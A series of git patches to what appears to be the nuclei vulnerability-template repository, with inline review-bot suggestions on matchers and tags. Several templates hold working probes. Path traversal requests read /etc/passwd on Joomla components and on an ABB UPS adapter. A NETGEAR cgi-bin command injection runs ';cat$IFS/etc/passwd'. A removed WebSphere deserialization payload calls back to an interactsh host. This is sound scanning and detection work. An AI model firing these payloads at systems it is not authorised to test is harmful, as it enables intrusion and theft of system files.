From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 3 Sep 2021 22:23:59 +0530 Subject: [PATCH 025/339] Update overview-kubernetes-resource-report.yaml --- misconfiguration/overview-kubernetes-resource-report.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/misconfiguration/overview-kubernetes-resource-report.yaml b/misconfiguration/overview-kubernetes-resource-report.yaml index 76c3dbd457..34d9dca54d 100644 --- a/misconfiguration/overview-kubernetes-resource-report.yaml +++ b/misconfiguration/overview-kubernetes-resource-report.yaml @@ -8,13 +8,12 @@ info: requests: - method: GET path: - - "{{BaseURL}}:9100/metrics" + - "{{BaseURL}}" matchers-condition: and matchers: - type: word part: body words: - - "Overview - Kubernetes Resource Report" - "Overview - Kubernetes Resource Report" - "Pods" - "Worker Nodes" @@ -22,4 +21,4 @@ requests: condition: and - type: status status: - - 200 \ No newline at end of file + - 200 From d27dadb79ef4901962673a90427d47fe132911a9 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 3 Sep 2021 22:24:11 +0530 Subject: [PATCH 026/339] updated matchers --- .../http-missing-security-headers.yaml | 146 ++++++++++-------- 1 file changed, 80 insertions(+), 66 deletions(-) diff --git a/misconfiguration/http-missing-security-headers.yaml b/misconfiguration/http-missing-security-headers.yaml index 350fcbe9db..97d80d6c05 100644 --- a/misconfiguration/http-missing-security-headers.yaml +++ b/misconfiguration/http-missing-security-headers.yaml 
@@ -11,103 +11,117 @@ requests: - method: GET path: - "{{BaseURL}}" + redirects: true max-redirects: 3 matchers-condition: or matchers: - - type: word - name: "Strict-Transport-Security" - words: - - "Strict-Transport-Security" - part: header + - type: regex + name: strict-transport-security + regex: + - "(?i)strict-transport-security" negative: true - - type: word - name: "Content-Security-Policy" - words: - - "Content-Security-Policy" part: header + + - type: regex + name: content-security-policy + regex: + - "(?i)content-security-policy" negative: true - - type: word - name: "X-Frame-Options" - words: - - "X-Frame-Options" part: header + + - type: regex + name: x-frame-options + regex: + - "(?i)x-frame-options" negative: true - - type: word - name: "X-Content-Type-Options" - words: - - "X-Content-Type-Options" part: header + + - type: regex + name: x-content-type-options + regex: + - "(?i)x-content-type-options" negative: true - - type: word - name: "X-Permitted-Cross-Domain-Policies" - words: - - "X-Permitted-Cross-Domain-Policies" part: header + + - type: regex + name: x-permitted-cross-domain-policies + regex: + - "(?i)x-permitted-cross-domain-policies" negative: true - - type: word - name: "Referrer-Policy" - words: - - "Referrer-Policy" part: header + + - type: regex + name: referrer-policy + regex: + - "(?i)referrer-policy" negative: true - - type: word - name: "Clear-Site-Data" - words: - - "Clear-Site-Data" part: header + + - type: regex + name: clear-site-data + regex: + - "(?i)clear-site-data" negative: true - - type: word - name: "Cross-Origin-Embedder-Policy" - words: - - "Cross-Origin-Embedder-Policy" part: header + + - type: regex + name: cross-origin-embedder-policy + regex: + - "(?i)cross-origin-embedder-policy" negative: true - - type: word - name: "Cross-Origin-Opener-Policy" - words: - - "Cross-Origin-Opener-Policy" part: header + + - type: regex + name: cross-origin-opener-policy + regex: + - "(?i)cross-origin-opener-policy" negative: true - 
- type: word - name: "Cross-Origin-Resource-Policy" - words: - - "Cross-Origin-Resource-Policy" part: header + + - type: regex + name: cross-origin-resource-policy + regex: + - "(?i)cross-origin-resource-policy" negative: true - - type: word - name: "Access-Control-Allow-Origin" - words: - - "Access-Control-Allow-Origin" part: header + + - type: regex + name: access-control-allow-origin + regex: + - "(?i)access-control-allow-origin" negative: true - - type: word - name: "Access-Control-Allow-Credentials" - words: - - "Access-Control-Allow-Credentials" part: header + + - type: regex + name: access-control-allow-credentials + regex: + - "(?i)access-control-allow-credentials" negative: true - - type: word - name: "Access-Control-Expose-Headers" - words: - - "Access-Control-Expose-Headers" part: header + + - type: regex + name: access-control-expose-headers + regex: + - "(?i)access-control-expose-headers" negative: true - - type: word - name: "Access-Control-Max-Age" - words: - - "Access-Control-Max-Age" part: header + + - type: regex + name: access-control-max-age + regex: + - "(?i)access-control-max-age" negative: true - - type: word - name: "Access-Control-Allow-Methods" - words: - - "Access-Control-Allow-Methods" part: header + + - type: regex + name: access-control-allow-methods + regex: + - "(?i)access-control-allow-methods" negative: true - - type: word - name: "Access-Control-Allow-Headers" - words: - - "Access-Control-Allow-Headers" part: header - negative: true + + - type: regex + name: access-control-allow-headers + regex: + - "(?i)access-control-allow-headers" \ No newline at end of file From da27280259b5e870d1ed11bc12e30ff6500b0621 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 3 Sep 2021 22:26:23 +0530 Subject: [PATCH 027/339] Added stop-at-first-match --- default-logins/abb/cs141-default-login.yaml | 1 + 1 file changed, 1 insertion(+) 
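Review bot: The last matcher on the new side, `access-control-allow-headers`, ends up without `negative: true` and without `part: header`: the old block's `negative: true` is deleted, and the preceding `part: header` context belongs to the `access-control-allow-methods` matcher, so after this rewrite the final entry is a positive default-part match for the string. Under `matchers-condition: or` that inverts its meaning — the template now reports whenever that header name merely appears in a response body — so add `negative: true` and `part: header` after the `- "(?i)access-control-allow-headers"` line, as every other matcher has. The interleaving of old `negative`/`part` context with new `regex` blocks makes this easy to miss; rewriting each matcher as a unit would have made the diff show it. The enclosing `requests` entry starts above the hunk.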
diff --git a/default-logins/abb/cs141-default-login.yaml b/default-logins/abb/cs141-default-login.yaml index cb51eede2c..531ed5ae2d 100644 --- a/default-logins/abb/cs141-default-login.yaml +++ b/default-logins/abb/cs141-default-login.yaml @@ -45,6 +45,7 @@ requests: {"userName":"guest","password":"guest"} + stop-at-first-match: true matchers-condition: and matchers: - type: word From f6c72769cee9a58a4cb3e110418008c0a8d805ba Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Fri, 3 Sep 2021 22:29:55 +0530 Subject: [PATCH 028/339] temporary moving to another branch --- cves/2020/CVE-2020-11420.yaml | 36 ----------------------------------- 1 file changed, 36 deletions(-) delete mode 100644 cves/2020/CVE-2020-11420.yaml diff --git a/cves/2020/CVE-2020-11420.yaml b/cves/2020/CVE-2020-11420.yaml deleted file mode 100644 index be676408b1..0000000000 --- a/cves/2020/CVE-2020-11420.yaml +++ /dev/null 
@@ -1,36 +0,0 @@ -id: CVE-2020-11420 - -info: - name: ABB UPS Adapter CS141 – Path traversal - author: socketz - severity: medium - description: | - A vulnerability exists in the UPS Adapter CS141 included in the versions 1.66 to 1.88. An attacker - with Admin or Engineer login credentials could exploit the vulnerability by manipulating variables that - reference files and by doing this achieve access to files and directories outside the web root folder. An - attacker may access arbitrary files and directories stored in the file system, but integrity of the files are - not jeopardized as attacker have read access rights only. This attack is commonly known as Path - Traversal or Directory Traversal. - This Path Traversal vulnerability could be exploited only when Alarm Logs have been processed, - and then you can exploit it, before that, you should wait. - reference: - - https://library.e.abb.com/public/ee46f3ff5823400f991ebd9bd43a297e/2CMT2020-005913%20Security%20Advisory%20CS141.pdf - tags: cve,cve2020,iot,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/api/devices/ups/control?code=getAlarmData&alarmFileName=../etc/passwd" - - headers: - Referer: "{{BaseURL}}/lib/history.html?inputType=0&upsEvtHistCapa=1&upsProtocol=" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:.*:0:0:" - part: body \ No newline at end of file From 32fed54169da875c38d139b61143aa7344234ae9 Mon Sep 17 00:00:00 2001 
From: sandeep Date: Fri, 3 Sep 2021 22:35:58 +0530 Subject: [PATCH 029/339] removing duplicate templates and few updates --- miscellaneous/missing-csp.yaml | 17 ----------------- miscellaneous/missing-hsts.yaml | 17 ----------------- .../missing-x-content-type-options.yaml | 18 ------------------ miscellaneous/missing-x-frame-options.yaml | 19 ------------------- .../http-missing-security-headers.yaml | 4 ++-- 5 files changed, 2 insertions(+), 73 deletions(-) delete mode 100644 miscellaneous/missing-csp.yaml delete mode 100644 miscellaneous/missing-hsts.yaml delete mode 100644 miscellaneous/missing-x-content-type-options.yaml delete mode 100644 miscellaneous/missing-x-frame-options.yaml diff --git a/miscellaneous/missing-csp.yaml b/miscellaneous/missing-csp.yaml deleted file mode 100644 index 0d2a7dc176..0000000000 --- a/miscellaneous/missing-csp.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: missing-csp -info: - name: CSP Not Enforced - author: geeknik - severity: info - description: Checks if there is a CSP header - tags: misc,generic - -requests: - - method: GET - path: - - '{{BaseURL}}' - redirects: true - matchers: - - type: dsl - dsl: - - '!contains(tolower(all_headers), ''content-security-policy'')' diff --git a/miscellaneous/missing-hsts.yaml b/miscellaneous/missing-hsts.yaml deleted file mode 100644 index 3f07038249..0000000000 --- a/miscellaneous/missing-hsts.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: missing-hsts -info: - name: Strict Transport Security Not Enforced - author: Dawid Czarnecki - severity: info - description: Checks if the HSTS is enabled by looking for Strict Transport Security response header. - tags: misc,generic - -requests: - - method: GET - path: - - '{{BaseURL}}' - redirects: true - matchers: - - type: dsl - dsl: - - '!contains(tolower(all_headers), ''strict-transport-security'')' 
diff --git a/miscellaneous/missing-x-content-type-options.yaml b/miscellaneous/missing-x-content-type-options.yaml deleted file mode 100644 index e059f4c9be..0000000000 --- a/miscellaneous/missing-x-content-type-options.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: missing-x-content-type-options - -info: - name: X-Content-Type-Options unidentified - author: G4L1T0 and @convisoappsec - severity: info - description: Check for X-Content-Type-Options header - tags: misc,generic - -requests: - - method: GET - path: - - '{{BaseURL}}' - redirects: true - matchers: - - type: dsl - dsl: - - '!contains(tolower(all_headers), ''x-content-type-options'')' diff --git a/miscellaneous/missing-x-frame-options.yaml b/miscellaneous/missing-x-frame-options.yaml deleted file mode 100644 index a7bece93c3..0000000000 --- a/miscellaneous/missing-x-frame-options.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: missing-x-frame-options - -info: - name: Clickjacking (Missing XFO header) - author: kurohost - severity: low - tags: misc,generic - -requests: - - method: GET - path: - - "{{BaseURL}}" - - redirects: true - max-redirects: 2 - matchers: - - type: dsl - dsl: - - "!contains(tolower(all_headers), 'x-frame-options')" diff --git a/misconfiguration/http-missing-security-headers.yaml b/misconfiguration/http-missing-security-headers.yaml index 97d80d6c05..aef6738399 100644 --- a/misconfiguration/http-missing-security-headers.yaml +++ b/misconfiguration/http-missing-security-headers.yaml @@ -2,10 +2,10 @@ id: http-missing-security-headers info: name: HTTP Missing Security Headers - author: socketz + author: socketz,geeknik,G4L1T0,convisoappsec,kurohost,dawid-czarnecki severity: info description: It searches missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty. - tags: config,headers,misconfiguration,generic + tags: misconfig,generic requests: - method: GET From 735b1df1c56648acb0968bf9ef751e8bd68b3f17 Mon Sep 17 00:00:00 2001 
From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Fri, 3 Sep 2021 12:09:59 -0500 Subject: [PATCH 030/339] Update php-errors.yaml --- misconfiguration/php-errors.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/misconfiguration/php-errors.yaml b/misconfiguration/php-errors.yaml index 11e7defb9f..02bd1efcb3 100644 --- a/misconfiguration/php-errors.yaml +++ b/misconfiguration/php-errors.yaml @@ -18,6 +18,7 @@ requests: - '(?i)Call to undefined method' - '(?i)You have an error in your SQL syntax' - '(?i)MySQL server version for the right syntax to use near' + - '(?i)MySQL cannot create a temporary file' - '(?i)PHP (Warning|Error)' - '(?i)Warning\: (pg|mysql)_(query|connect)\(\)' - '(?i)failed to open stream\:' @@ -35,3 +36,5 @@ requests: - '(?i)expects parameter [0-9]*' - '(?i)Debug Trace' - '(?i)(syntax|parse) error' + - '(?i)Allowed Memory Size of \d* Bytes Exhausted' + - '(?i)Maximum execution time of \d* seconds exceeded' From c61276d34e70fff0663c8ed8f2f9b3666a6aa8e8 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sat, 4 Sep 2021 10:35:49 +0700 Subject: [PATCH 031/339] Create CVE-2010-1476.yaml --- cves/2010/CVE-2010-1476.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1476.yaml diff --git a/cves/2010/CVE-2010-1476.yaml b/cves/2010/CVE-2010-1476.yaml new file mode 100644 index 0000000000..c1718acac9 --- /dev/null +++ b/cves/2010/CVE-2010-1476.yaml 
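Review bot: The two patterns appended at the bottom of the list, `'(?i)Allowed Memory Size of \d* Bytes Exhausted'` and `'(?i)Maximum execution time of \d* seconds exceeded'`, match the bare message with `\d*` allowing no digits at all, so any page that merely quotes the text (PHP documentation, a forum thread, a changelog) is reported as an error leak alongside a real fatal. PHP emits both as `Fatal error` messages with a concrete figure, so requiring that prefix and at least one digit tightens them at no cost: `- '(?i)Fatal error.{0,10}Allowed memory size of \d+ bytes exhausted'` and `- '(?i)Fatal error.{0,10}Maximum execution time of \d+ seconds exceeded'`, where the `.{0,10}` absorbs the `</b>:` that html_errors inserts between the label and the message (confirm against a live response, this is from memory). The `regex:` list these belong to and its matcher header start above the hunk.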
@@ -0,0 +1,27 @@
+id: CVE-2010-1476
+
+info:
+ name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12150
+ - https://www.cvedetails.com/cve/CVE-2010-1476
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
From 4c0e1b9fea4844601c6f7bff4175802ebc841b3b Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Sat, 4 Sep 2021 11:00:25 +0700
Subject: [PATCH 032/339] Create CVE-2010-1307.yaml
---
 cves/2010/CVE-2010-1307.yaml | 27 +++++++++++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 cves/2010/CVE-2010-1307.yaml
diff --git a/cves/2010/CVE-2010-1307.yaml b/cves/2010/CVE-2010-1307.yaml
new file mode 100644
index 0000000000..70c1ac485f
--- /dev/null
+++ b/cves/2010/CVE-2010-1307.yaml
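Review bot: The single probe on the `path` line depends on `%00` truncating whatever the component appends after `view=`, and PHP stopped honouring null bytes in filesystem paths in 5.3.4, so a host still running the vulnerable component on a newer PHP answers without the passwd contents and the template reports it clean. If the exploit-db PoC shows the component works without a forced suffix, a second path with the same regex/status matchers would cover that case: `- "{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd"` — confirm against the PoC before adding it, since a forced `.php` suffix would make the extra request pure noise. The `root:.*:0:0` matcher carries no `part:` and relies on nuclei's body default, which the sibling Joomla template in the next commit also does; writing `part: body` once makes the intent explicit.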
@@ -0,0 +1,27 @@
+id: CVE-2010-1307
+
+info:
+ name: Joomla! Component Magic Updater - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12070
+ - https://www.cvedetails.com/cve/CVE-2010-1307
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
From f1e770fc06be144b7d1d291bc003df15ab5eee65 Mon Sep 17 00:00:00 2001
From: idealphase
Date: Sat, 4 Sep 2021 14:00:28 +0700
Subject: [PATCH 033/339] Added CVE-2019-18818
Added CVE-2019-18818
---
 cves/2019/CVE-2019-18818.yaml | 32 ++++++++++++++++++++++++++++++++
 1 file changed, 32 insertions(+)
 create mode 100644 cves/2019/CVE-2019-18818.yaml
diff --git a/cves/2019/CVE-2019-18818.yaml b/cves/2019/CVE-2019-18818.yaml
new file mode 100644
index 0000000000..b4c3f64440
--- /dev/null
+++ b/cves/2019/CVE-2019-18818.yaml
@@ -0,0 +1,32 @@ +id: CVE-2019-18818 + +info: + name: Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated) + author: idealphase + description: strapi before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js. + reference: + - https://www.exploit-db.com/exploits/50239 + - https://nvd.nist.gov/vuln/detail/CVE-2019-18818 + severity: critical + tags: cve,cve2019,strapi,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/admin/strapiVersion" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "strapiVersion" + part: body + + - type: word + words: + - '3.0.0-beta.17.4' + part: bod From 226d48db4c443e82cd0189b0ab9a51380f401b9c Mon Sep 17 00:00:00 2001 From: idealphase Date: Sat, 4 Sep 2021 14:07:24 +0700 Subject: [PATCH 034/339] Update CVE-2019-18818.yaml Added matchers header --- cves/2019/CVE-2019-18818.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-18818.yaml b/cves/2019/CVE-2019-18818.yaml index b4c3f64440..7ceb685ff8 100644 --- a/cves/2019/CVE-2019-18818.yaml +++ b/cves/2019/CVE-2019-18818.yaml @@ -20,6 +20,11 @@ requests: - type: status status: - 200 + + - type: word + words: + - "application/json" + part: header - type: word words: @@ -29,4 +34,4 @@ requests: - type: word words: - '3.0.0-beta.17.4' - part: bod + part: body From b7a05877682ac3240b8f85077253082c93a1f280 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 4 Sep 2021 13:59:56 +0530 Subject: [PATCH 035/339] Update CVE-2019-18818.yaml --- cves/2019/CVE-2019-18818.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-18818.yaml b/cves/2019/CVE-2019-18818.yaml index 7ceb685ff8..01fceb5e82 100644 --- a/cves/2019/CVE-2019-18818.yaml +++ b/cves/2019/CVE-2019-18818.yaml 
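Review bot: The last word matcher pins the exact string `3.0.0-beta.17.4`, while the description says everything before 3.0.0-beta.17.5 mishandles password resets, so any earlier beta still deployed is never reported; and because the only request is `GET /admin/strapiVersion`, a `critical` hit here is a version fingerprint, not a confirmation of the reset flaw, which the name "Remote Code Execution (Unauthenticated)" should make clear. A regex matcher on the version field covers the advertised range, e.g. `- '3\.0\.0-beta\.([0-9]|1[0-6])(\.[0-9]+)?"|3\.0\.0-beta\.17\.[0-4]"'` with `type: regex`, assuming the JSON quotes the version and that the beta numbering runs as the advisory implies — confirm both against a real response before adopting it. `part: bod` on the final line is a typo for `body`; the following commit in this series corrects it.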
@@ -20,7 +20,7 @@ requests: - type: status status: - 200 - + - type: word words: - "application/json" From a30ee89de4e745b233138b11894102b4183d949c Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 4 Sep 2021 14:38:33 +0530 Subject: [PATCH 036/339] temporary removal This template requires support that will be part of next version of nuclei, as such keeping this template in PR till next nuclei release --- cves/2015/CVE-2015-7450.yaml | 51 ------------------------------------ 1 file changed, 51 deletions(-) delete mode 100644 cves/2015/CVE-2015-7450.yaml diff --git a/cves/2015/CVE-2015-7450.yaml b/cves/2015/CVE-2015-7450.yaml deleted file mode 100644 index a28bfc6ead..0000000000 --- a/cves/2015/CVE-2015-7450.yaml +++ /dev/null 
@@ -1,51 +0,0 @@ -id: CVE-2015-7450 - -info: - name: IBM WebSphere Java Object Deserialization RCE - author: wdahlenb - severity: critical - description: Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default) - reference: - - https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py - - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ - - https://nvd.nist.gov/vuln/detail/CVE-2015-7450 - tags: cve,cve2015,websphere,deserialization,rce - -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/xml; charset=utf-8 - SOAPAction: "urn:AdminService" - - - - - - - - rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA== - getUnsavedChanges - {{ generate_java_gadget("dns", "{{interactsh-url}}", "base64")}} - rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24= - - - - - matchers-condition: and - matchers: - - type: status - status: - - 500 - - - type: word - words: - - 'SOAP-ENV:Server' - - '' - condition: and - - - type: word - part: interactsh_protocol # Confirms the DNS Interaction - words: - - "dns" From 29b772a14b96a21e19d8eb2ecaf40304cdd0252c Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sat, 4 Sep 2021 16:45:28 +0700 Subject: [PATCH 037/339] Create CVE-2016-6277.yaml --- cves/2016/CVE-2016-6277.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2016/CVE-2016-6277.yaml 
diff --git a/cves/2016/CVE-2016-6277.yaml b/cves/2016/CVE-2016-6277.yaml
new file mode 100644
index 0000000000..6f61ebef3c
--- /dev/null
+++ b/cves/2016/CVE-2016-6277.yaml
@@ -0,0 +1,27 @@
+id: CVE-2016-6277
+
+info:
+ name: NETGEAR routers (including R6400, R7000, R8000 and similar) RCE
+ author: pikpikcu
+ severity: critical
+ reference:
+ - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/
+ - https://nvd.nist.gov/vuln/detail/CVE-2016-6277
+ description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.
+ tags: cve,cves2016,netgear,rce
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
From b74dffae920b64923bb55b726593d9f99e858957 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Sat, 4 Sep 2021 15:23:49 +0530
Subject: [PATCH 038/339] misc update
---
 ...exposed-metrics.yaml => kubernetes-metrics.yaml} | 13 +++++++++----
 1 file changed, 9 insertions(+), 4 deletions(-)
 rename misconfiguration/{kubernetes-exposed-metrics.yaml => kubernetes-metrics.yaml} (62%)
diff --git a/misconfiguration/kubernetes-exposed-metrics.yaml b/misconfiguration/kubernetes-metrics.yaml
similarity index 62%
rename from misconfiguration/kubernetes-exposed-metrics.yaml
rename to misconfiguration/kubernetes-metrics.yaml
index f33fd429b0..ff9910a0cd 100644
--- a/misconfiguration/kubernetes-exposed-metrics.yaml
+++ b/misconfiguration/kubernetes-metrics.yaml
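Review bot: The `tags` line reads `cve,cves2016,netgear,rce`, and `cves2016` breaks the `cve<year>` convention the other templates in this series use (`cve2010` in CVE-2010-1476, `cve2019` in CVE-2019-18818, and the tag table at the end of the page counts `cve2016`, not `cves2016`), so a `-tags cve2016` run skips this template silently. The two follow-up commits below that move and re-indent the info block both keep the typo. It should be `tags: cve,cve2016,netgear,rce` (plus the `iot` the later commit adds).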
@@ -1,24 +1,29 @@ -id: kubernetes-exposed-metrics +id: kubernetes-metrics + info: name: Detect Kubernetes Exposed Metrics author: pussycat0x severity: low description: Information Disclosure of Garbage Collection - tags: kubernetes,exposure, metrics + tags: kubernetes,exposure,devops + reference: https://kubernetes.io/docs/concepts/cluster-administration/system-metrics/#metrics-in-kubernetes + requests: - method: GET path: - - "{{BaseURL}}:8080/metrics" + - "{{BaseURL}}/metrics" + matchers-condition: and matchers: - type: word part: body + condition: and words: - "namespace" - "HELP" - "TYPE" - "kube" - condition: and + - type: status status: - 200 \ No newline at end of file From 82631062a1dee87b42a16043622e3b3ba4189c23 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 4 Sep 2021 15:24:59 +0530 Subject: [PATCH 039/339] misc update --- cves/2016/CVE-2016-6277.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2016/CVE-2016-6277.yaml b/cves/2016/CVE-2016-6277.yaml index 6f61ebef3c..15e20f4634 100644 --- a/cves/2016/CVE-2016-6277.yaml +++ b/cves/2016/CVE-2016-6277.yaml 
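Review bot: `description: Information Disclosure of Garbage Collection` survives this rewrite of the info block as a context line, yet nothing the template does relates to garbage collection — the request fetches `/metrics` and the word matcher looks for Prometheus exposition text containing `namespace`, `HELP`, `TYPE` and `kube`; the identical sentence sits in node-exporter-metrics.yaml further down this series, which suggests a copy-paste. Since the commit already touches `id`, `tags` and `reference`, the line is worth fixing at the same time, for example `description: Kubernetes component /metrics endpoint reachable without authentication, exposing internal metric names and labels.` Dropping the explicit `:8080` from the path also means the template now depends on the caller supplying the right port in the target, which is fine but worth a one-line comment above `path:`.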
@@ -4,11 +4,11 @@ info: name: NETGEAR routers (including R6400, R7000, R8000 and similar) RCE author: pikpikcu severity: critical - reference: - - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ - - https://nvd.nist.gov/vuln/detail/CVE-2016-6277 + reference: + - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ + - https://nvd.nist.gov/vuln/detail/CVE-2016-6277 description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/. - tags: cve,cves2016,netgear,rce + tags: cve,cves2016,netgear,rce,iot requests: - method: GET From f4187c14da3724859226d4e7aa8d2f3d4e14b7de Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 4 Sep 2021 15:28:58 +0530 Subject: [PATCH 040/339] Update CVE-2016-6277.yaml --- cves/2016/CVE-2016-6277.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-6277.yaml b/cves/2016/CVE-2016-6277.yaml index 15e20f4634..964fdfed40 100644 --- a/cves/2016/CVE-2016-6277.yaml +++ b/cves/2016/CVE-2016-6277.yaml 
@@ -4,11 +4,11 @@ info: name: NETGEAR routers (including R6400, R7000, R8000 and similar) RCE author: pikpikcu severity: critical + description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/. + tags: cve,cves2016,netgear,rce,iot reference: - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ - https://nvd.nist.gov/vuln/detail/CVE-2016-6277 - description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/. - tags: cve,cves2016,netgear,rce,iot requests: - method: GET From 4a9a339feb6fe0a57c8cb0f5577d71a6bc287e7a Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 4 Sep 2021 15:40:34 +0530 Subject: [PATCH 041/339] misc update --- misconfiguration/node-exporter-metrics.yaml | 13 ++++++------- 1 file changed, 6 insertions(+), 7 deletions(-) diff --git a/misconfiguration/node-exporter-metrics.yaml b/misconfiguration/node-exporter-metrics.yaml index 5320578547..b5242c50c6 100644 --- a/misconfiguration/node-exporter-metrics.yaml +++ b/misconfiguration/node-exporter-metrics.yaml 
